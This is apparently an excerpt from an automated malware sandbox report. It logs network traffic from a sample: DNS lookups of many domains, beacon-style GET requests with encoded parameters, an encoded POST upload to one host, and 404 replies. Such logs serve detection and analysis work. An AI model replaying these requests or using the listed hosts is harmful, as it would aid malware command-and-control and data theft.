            Source: global trafficHTTP traffic detected: GET /0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.mysticriverpath.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.mscuration.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.wb515.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.hf7777hi.netUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.qrdinamicos.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.jleabres.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.angrytee.com
            Source: global trafficDNS traffic detected: DNS query: www.orthonow.live
            Source: global trafficDNS traffic detected: DNS query: www.boutiqueinaboxshop.com
            Source: global trafficDNS traffic detected: DNS query: www.lmsforsme.com
            Source: global trafficDNS traffic detected: DNS query: www.fundraiserstuffies.com
            Source: global trafficDNS traffic detected: DNS query: www.soutsour.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mysticriverpath.com
            Source: global trafficDNS traffic detected: DNS query: www.mscuration.com
            Source: global trafficDNS traffic detected: DNS query: www.wb515.com
            Source: global trafficDNS traffic detected: DNS query: www.hf7777hi.net
            Source: global trafficDNS traffic detected: DNS query: www.qrdinamicos.com
            Source: global trafficDNS traffic detected: DNS query: www.personal-stylist.club
            Source: global trafficDNS traffic detected: DNS query: www.jleabres.com
            Source: global trafficDNS traffic detected: DNS query: www.pu6wac.buzz
            Source: unknownHTTP traffic detected: POST /v6z4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 200Connection: closeHost: www.orthonow.liveOrigin: http://www.orthonow.liveReferer: http://www.orthonow.live/v6z4/User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 67 4e 6c 3d 69 37 6d 46 77 69 4b 52 4d 48 42 4f 6c 54 38 49 77 36 58 46 54 49 4c 7a 50 38 36 4d 46 36 61 4b 76 73 76 4f 6a 2f 68 54 67 38 72 68 69 52 56 34 38 67 57 5a 32 4d 6e 6e 6c 30 45 73 76 57 50 61 69 72 5a 30 4c 75 70 47 75 36 48 31 38 57 56 58 74 6b 65 78 46 68 72 31 52 6d 63 42 4b 55 4e 64 5a 57 38 47 6e 79 42 62 43 53 4e 4a 74 58 58 4f 30 6a 39 61 55 47 7a 51 42 70 64 68 7a 49 50 53 6c 53 68 73 2f 39 30 73 46 78 49 6e 6e 51 32 4b 43 72 65 78 4c 47 37 42 75 4f 2f 51 31 2b 69 6c 76 33 33 69 4d 32 48 58 4d 71 64 50 6a 62 58 42 62 2b 51 78 47 59 2b 69 50 6c 6a 44 65 68 38 6c 51 67 3d 3d Data Ascii: gNl=i7mFwiKRMHBOlT8Iw6XFTILzP86MF6aKvsvOj/hTg8rhiRV48gWZ2Mnnl0EsvWPairZ0LupGu6H18WVXtkexFhr1RmcBKUNdZW8GnyBbCSNJtXXO0j9aUGzQBpdhzIPSlShs/90sFxInnQ2KCrexLG7BuO/Q1+ilv33iM2HXMqdPjbXBb+QxGY+iPljDeh8lQg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:34:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:34:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:34:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:35:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:35:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:35:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:35:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 07:35:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:35:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:35:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 